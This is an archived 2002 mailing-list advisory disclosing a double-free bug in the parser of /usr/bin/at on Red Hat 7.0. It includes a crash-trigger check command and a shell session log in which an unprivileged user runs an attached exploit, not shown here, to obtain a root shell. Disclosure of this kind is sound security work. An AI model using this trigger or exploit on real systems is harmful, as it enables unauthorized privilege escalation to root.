Affects: /usr/bin/at
To check if you are potentially vulnerable to this exploit, execute:
/usr/bin/at 31337 + vuln
If you are vulnerable this will cause:
Segmentation fault
If not, there will be a message similar to:
Garbled time
(possibly with some extra information)
The problem is caused by a bug in the parser which deallocates the same
memory location twice.
This can sometimes be exploited, for the uid of "daemon", and due to some
other minor problems, may allow root access from there.
Attached is an exploit for Redhat 7.0.
bash-2.04$ rpm -qf /lib/libc-*
glibc-2.2.4-18.7.0.3
bash-2.04$ rpm -qf /usr/bin/at
at-3.1.8-12
bash-2.04$ tar -xzf attn.tar.gz
bash-2.04$ cd attn
bash-2.04$ id
uid=500(evil) gid=500(evil) groups=500(evil)
bash-2.04$ ./doit.sh
woot-2.04# id
uid=0(root) gid=0(root) groups=500(evil)
woot-2.04# echo "I was just testing something and you need to fix at or some malicious hacker could be evil." |mail -s "Fix /usr/bin/at" root
woot-2.04# exit
bash-2.04$
-- zen-parse
-------------------------------------------------------------------------
1) If this message was posted to a public forum by zen-parse@gmx.net, it
may be redistributed without modification.
2) In any other case the contents of this message is confidential and not
to be distributed in any form without express permission from the author.
This document may contain Unclassified Controlled Nuclear Information.
This archive was generated by hypermail 2.1.3 : Thu Jan 17 2002 - 18:00:32 CET